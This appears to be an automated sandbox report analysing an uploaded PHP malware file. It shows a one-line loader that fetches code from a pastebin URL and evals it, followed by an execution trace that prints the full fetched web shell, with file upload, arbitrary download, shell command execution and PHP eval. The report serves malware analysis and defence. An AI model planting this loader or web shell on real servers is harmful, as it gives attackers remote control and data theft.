PHP Malware Analysis
1.php
md5: 94e6ec557673ff6ecb1552a2343d9bfc
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Original)
- move_uploaded_file (Traces)
Input
URLs
- http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css (HTML, Traces)
- http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js (HTML, Traces)
- https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js (HTML, Traces)
- https://pastebin.com/raw/1bqzuGb7 (Deobfuscated, Original, Traces)
Deobfuscated PHP code
1 2 <?php
eval("?>" . file_get_contents("https://pastebin.com/raw/1bqzuGb7"));
?> 4 5 6 7 8 9 10 11 12 13 14 15
save as php fileExecution traces
data/traces/94e6ec557673ff6ecb1552a2343d9bfc_trace-1676247910.2223.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:25:36.120087]
1 0 1 0.000148 393464
1 3 0 0.000194 393720 {main} 1 /var/www/html/uploads/1.php 0 0
2 4 0 0.000210 393720 file_get_contents 0 /var/www/html/uploads/1.php 1 1 'https://pastebin.com/raw/1bqzuGb7'
2 4 1 0.045382 403512
2 4 R '<?php\r\n\r\nif (isset($_POST[\'download\'])) {\r\n\t$file = $_POST[\'download\'];\r\n\tif (file_exists($file)) {\r\n\t header(\'Content-Description: File Transfer\');\r\n\t header(\'Content-Type: application/octet-stream\');\r\n\t header(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\r\n\t header(\'Expires: 0\');\r\n\t header(\'Cache-Control: must-revalidate\');\r\n\t header(\'Pragma: public\');\r\n\t header(\'Content-Length: \' . filesize($file));\r\n\t rea'
2 5 0 0.045749 443568 eval 1 '?><?php\r\n\r\nif (isset($_POST[\'download\'])) {\r\n\t$file = $_POST[\'download\'];\r\n\tif (file_exists($file)) {\r\n\t header(\'Content-Description: File Transfer\');\r\n\t header(\'Content-Type: application/octet-stream\');\r\n\t header(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\r\n\t header(\'Expires: 0\');\r\n\t header(\'Cache-Control: must-revalidate\');\r\n\t header(\'Pragma: public\');\r\n\t header(\'Content-Length: \' . filesize($file));\r\n\t readfile($file);\r\n\t exit;\r\n\t}\r\n}\r\n\r\n?>\r\n\r\n<html>\r\n<!-- Latest compiled and minified CSS -->\r\n<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">\r\n\r\n<!-- jQuery library -->\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>\r\n\r\n<!-- Latest compiled JavaScript -->\r\n<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>\r\n\r\n<style>\r\n.btn-link {\r\n border: none;\r\n outline: none;\r\n background: none;\r\n cursor: pointer;\r\n color: #0000EE;\r\n padding: 0;\r\n text-decoration: underline;\r\n font-family: inherit;\r\n font-size: inherit;\r\n}\r\n</style>\r\n\r\n<div class="container">\r\n\r\n\r\n<?php\r\n\r\nfunction printPerms($file) {\r\n\t$mode = fileperms($file);\r\n\tif( $mode & 0x1000 ) { $type=\'p\'; }\r\n\telse if( $mode & 0x2000 ) { $type=\'c\'; }\r\n\telse if( $mode & 0x4000 ) { $type=\'d\'; }\r\n\telse if( $mode & 0x6000 ) { $type=\'b\'; }\r\n\telse if( $mode & 0x8000 ) { $type=\'-\'; }\r\n\telse if( $mode & 0xA000 ) { $type=\'l\'; }\r\n\telse if( $mode & 0xC000 ) { $type=\'s\'; }\r\n\telse $type=\'u\';\r\n\t$owner["read"] = ($mode & 00400) ? \'r\' : \'-\';\r\n\t$owner["write"] = ($mode & 00200) ? \'w\' : \'-\';\r\n\t$owner["execute"] = ($mode & 00100) ? \'x\' : \'-\';\r\n\t$group["read"] = ($mode & 00040) ? \'r\' : \'-\';\r\n\t$group["write"] = ($mode & 00020) ? \'w\' : \'-\';\r\n\t$group["execute"] = ($mode & 00010) ? \'x\' : \'-\';\r\n\t$world["read"] = ($mode & 00004) ? \'r\' : \'-\';\r\n\t$world["write"] = ($mode & 00002) ? \'w\' : \'-\';\r\n\t$world["execute"] = ($mode & 00001) ? \'x\' : \'-\';\r\n\tif( $mode & 0x800 ) $owner["execute"] = ($owner[\'execute\']==\'x\') ? \'s\' : \'S\';\r\n\tif( $mode & 0x400 ) $group["execute"] = ($group[\'execute\']==\'x\') ? \'s\' : \'S\';\r\n\tif( $mode & 0x200 ) $world["execute"] = ($world[\'execute\']==\'x\') ? \'t\' : \'T\';\r\n\t$s=sprintf("%1s", $type);\r\n\t$s.=sprintf("%1s%1s%1s", $owner[\'read\'], $owner[\'write\'], $owner[\'execute\']);\r\n\t$s.=sprintf("%1s%1s%1s", $group[\'read\'], $group[\'write\'], $group[\'execute\']);\r\n\t$s.=sprintf("%1s%1s%1s", $world[\'read\'], $world[\'write\'], $world[\'execute\']);\r\n\treturn $s;\r\n}\r\n\r\n\r\n$dir = $_POST[\'dir\'];\r\nif (isset($_GET[\'dir\'])) {\r\n\t$dir = $_GET[\'dir\'];\r\n}\r\n$file = \'\';\r\nif ($dir == NULL or !is_dir($dir)) {\r\n\tif (is_file($dir)) {\r\n\t\techo "enters";\r\n\t\t$file = $dir;\r\n\t\techo $file;\r\n\t}\r\n\t$dir = \'./\';\r\n}\r\n$dir = realpath($dir.\'/\'.$value);\r\n\r\n$dirs = scandir($dir);\r\necho "<h2>Viewing directory " . $dir . "</h2>";\r\necho "\\n<br><form action=\'".$_SERVER[\'PHP_SELF\']."\' method=\'POST\'>";\r\necho "<input type=\'hidden\' name=\'dir\' value=".$dir." />";\r\necho "<input type=\'text\' name=\'cmd\' size=120 autocomplete=\'off\' autofocus>\\n<input type=\'submit\' value=\'Run\'><br>\\n";\r\necho "<input type=\'text\' name=\'eval\' size=120 autocomplete=\'off\' autofocus>\\n<input type=\'submit\' value=\'Execute\'>\\n";\r\necho "</form>";\r\necho "\\n<br>\\n<div class=\'navbar-form\'><form action=\'".$_SERVER[\'PHP_SELF\']."\' method=\'POST\' enctype=\'multipart/form-data\'>\\n";\r\necho "<input type=\'hidden\' name=\'dir\' value=\'".$_POST[\'dir\']."\'/> ";\r\necho "<input type=\'file\' name=\'fileToUpload\' id=\'fileToUpload\'>\\n<br><input type=\'submit\' value=\'Upload File\' name=\'submit\'>";\r\necho "</div>";\r\n\r\nif (isset($_POST[\'submit\'])) {\r\n\t$uploadDirectory = $dir.\'/\'.basename($_FILES[\'fileToUpload\'][\'name\']);\r\n\tif (file_exists($uploadDirectory)) {\r\n \techo "<br><br><b style=\'color:red\'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";\r\n\t}\r\n\telse if (move_uploaded_file($_FILES[\'fileToUpload\'][\'tmp_name\'], $uploadDirectory)) {\r\n\t\techo \'<br><br><b>File \'.$_FILES[\'fileToUpload\'][\'name\'].\' uploaded successfully in \'.$dir.\' !</b><br>\';\r\n\t} else {\r\n\t\techo \'<br><br><b style="color:red">Error uploading file \'.$uploadDirectory.\'</b><br><br>\';\r\n\r\n\t}\r\n\r\n}\r\n\r\nif (isset($_POST[\'cmd\']) && $_POST[\'cmd\'] != "") {\r\n\techo "<br><br><b>Result of command execution: </b><br>";\r\n\texec(\'cd \'.$dir.\' && \'.$_POST[\'cmd\'], $cmdresult);\r\n\tforeach ($cmdresult as $key => $value) {\r\n\t\techo "$value \\n<br>";\r\n\t}\r\n}\r\n\r\nif (isset($_POST[\'eval\']) && $_POST[\'eval\'] != "") {\r\n\techo "<br><br><b>Result of evaluation: </b><br>";\r\n\tchdir($dir);\r\n\tvar_dump(eval($_POST[\'eval\']));\r\n\techo "\\n<br>";\r\n}\r\necho "<br>";\r\n?>\r\n\r\n<table class="table table-hover table-bordered">\r\n <thead>\r\n <tr>\r\n <th>Name</th>\r\n <th>Owner</th>\r\n <th>Permissions</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n<?php\r\nforeach ($dirs as $key => $value) {\r\n\techo "<form action=\'" . $_SERVER[\'PHP_SELF\'] . "\' method=\'POST\'><tr>";\r\n\tif (is_dir(realpath($dir.\'/\'.$value))) {\r\n\t\t//echo "<td><a href=\'". $_SERVER[\'PHP_SELF\'] . "?dir=". realpath($dir.\'/\'.$value) . "/\'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t\techo "<td><button type=\'submit\' name=\'dir\' value=\'". realpath($dir.\'/\'.$value) . "\' class=\'btn-link\'>". $value ."</button></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t}\r\n\telse {\r\n\t\t//echo "<td><a href=\'". $_SERVER[\'PHP_SELF\'] . "?download=". realpath($dir.\'/\'.$value) . "\'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t\techo "<td><button type=\'submit\' name=\'download\' value=\'". realpath($dir.\'/\'.$value) . "\' class=\'btn-link\'>". $value ."</button></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t}\r\n\techo "</tr></form>";\r\n}\r\necho "</tbody>";\r\necho "</table>";\r\n\r\n\r\n?>\r\n\r\n\r\n\r\n</div>\r\n</html>' /var/www/html/uploads/1.php 1 0
2 A /var/www/html/uploads/1.php(1) : eval()'d code 79 $dir = NULL
2 A /var/www/html/uploads/1.php(1) : eval()'d code 83 $file = ''
3 6 0 0.046052 443568 is_file 0 /var/www/html/uploads/1.php(1) : eval()'d code 85 1 NULL
3 6 1 0.046071 443608
3 6 R FALSE
2 A /var/www/html/uploads/1.php(1) : eval()'d code 90 $dir = './'
3 7 0 0.046106 443600 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 92 1 './/'
3 7 1 0.046127 443680
3 7 R '/var/www/html/uploads'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 92 $dir = '/var/www/html/uploads'
3 8 0 0.046153 443616 scandir 0 /var/www/html/uploads/1.php(1) : eval()'d code 94 1 '/var/www/html/uploads'
3 8 1 0.046211 444232
3 8 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/1.php(1) : eval()'d code 94 $dirs = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 0
3 9 0 0.046280 444248 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.'
3 9 1 0.046295 444328
3 9 R '/var/www/html/uploads'
3 10 0 0.046310 444248 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads'
3 10 1 0.046327 444312
3 10 R TRUE
3 11 0 0.046341 444272 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/.'
3 11 1 0.046354 444352
3 11 R '/var/www/html/uploads'
3 12 0 0.046370 444400 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/.'
3 12 1 0.046394 444440
3 12 R 0
3 13 0 0.046407 444352 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 13 1 0.046451 445152
3 13 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 14 0 0.046486 444384 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 15 0 0.046501 444384 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 15 1 0.046518 444424
4 15 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 16 0 0.046657 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 16 1 0.046672 445896
4 16 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 17 0 0.046696 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 17 1 0.046712 446216
4 17 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 18 0 0.046736 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 18 1 0.046752 445928
4 18 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 19 0 0.046775 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 19 1 0.046790 445928
4 19 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 14 1 0.046813 444424
3 14 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 1
3 20 0 0.046840 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/..'
3 20 1 0.046854 444352
3 20 R '/var/www/html'
3 21 0 0.046868 444264 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html'
3 21 1 0.046884 444296
3 21 R TRUE
3 22 0 0.046897 444272 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/..'
3 22 1 0.046911 444344
3 22 R '/var/www/html'
3 23 0 0.046925 444400 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/..'
3 23 1 0.046941 444456
3 23 R 0
3 24 0 0.046953 444360 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 24 1 0.046978 445160
3 24 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 25 0 0.047008 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 26 0 0.047022 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 26 1 0.047038 444424
4 26 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 27 0 0.047176 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 27 1 0.047190 445896
4 27 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 28 0 0.047213 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 28 1 0.047228 446216
4 28 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 29 0 0.047252 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 29 1 0.047266 445928
4 29 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 30 0 0.047289 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 30 1 0.047304 445928
4 30 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 25 1 0.047327 444424
3 25 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 2
3 31 0 0.047353 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.047369 444368
3 31 R '/var/www/html/uploads/.htaccess'
3 32 0 0.047384 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.047400 444328
3 32 R FALSE
3 33 0 0.047413 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
3 33 1 0.047426 444376
3 33 R '/var/www/html/uploads/.htaccess'
3 34 0 0.047441 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
3 34 1 0.047455 444488
3 34 R 0
3 35 0 0.047467 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 0
3 35 1 0.047490 445192
3 35 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 36 0 0.047520 444424 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 37 0 0.047533 444424 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 37 1 0.047549 444456
4 37 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 38 0 0.047699 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 38 1 0.047714 445928
4 38 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 39 0 0.047739 445864 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 39 1 0.047770 446248
4 39 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 40 0 0.047796 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 40 1 0.047811 445960
4 40 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 41 0 0.047834 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 41 1 0.047853 445960
4 41 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 36 1 0.047876 444456
3 36 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 3
3 42 0 0.047902 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/1.php'
3 42 1 0.047917 444368
3 42 R '/var/www/html/uploads/1.php'
3 43 0 0.047931 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/1.php'
3 43 1 0.047948 444328
3 43 R FALSE
3 44 0 0.047961 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/1.php'
3 44 1 0.047975 444376
3 44 R '/var/www/html/uploads/1.php'
3 45 0 0.047990 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/1.php'
3 45 1 0.048004 444488
3 45 R 1000
3 46 0 0.048017 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 1000
3 46 1 0.048049 445208
3 46 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 47 0 0.048083 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 48 0 0.048097 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 48 1 0.048112 444424
4 48 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 49 0 0.048245 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 49 1 0.048259 445896
4 49 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 50 0 0.048282 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 50 1 0.048297 446216
4 50 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 51 0 0.048320 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 51 1 0.048335 445928
4 51 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 52 0 0.048358 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 52 1 0.048373 445928
4 52 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 47 1 0.048396 444424
3 47 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 4
3 53 0 0.048422 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/data'
3 53 1 0.048438 444368
3 53 R '/var/www/html/uploads/data'
3 54 0 0.048452 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/data'
3 54 1 0.048467 444328
3 54 R TRUE
3 55 0 0.048480 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/data'
3 55 1 0.048493 444376
3 55 R '/var/www/html/uploads/data'
3 56 0 0.048508 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/data'
3 56 1 0.048522 444488
3 56 R 0
3 57 0 0.048534 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 57 1 0.048562 445192
3 57 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 58 0 0.048592 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 59 0 0.048606 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 59 1 0.048621 444424
4 59 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 60 0 0.048754 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 60 1 0.048768 445896
4 60 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 61 0 0.048791 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 61 1 0.048807 446216
4 61 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 62 0 0.048830 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 62 1 0.048854 445928
4 62 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 63 0 0.048877 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 63 1 0.048892 445928
4 63 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 58 1 0.048915 444424
3 58 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 5
3 64 0 0.048940 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/prepend.php'
3 64 1 0.048955 444384
3 64 R '/var/www/html/uploads/prepend.php'
3 65 0 0.048969 444288 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/prepend.php'
3 65 1 0.048986 444344
3 65 R FALSE
3 66 0 0.048999 444304 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
3 66 1 0.049012 444400
3 66 R '/var/www/html/uploads/prepend.php'
3 67 0 0.049028 444464 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
3 67 1 0.049042 444504
3 67 R 0
3 68 0 0.049054 444400 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 0
3 68 1 0.049077 445200
3 68 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 69 0 0.049107 444432 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 70 0 0.049121 444432 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 70 1 0.049137 444456
4 70 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
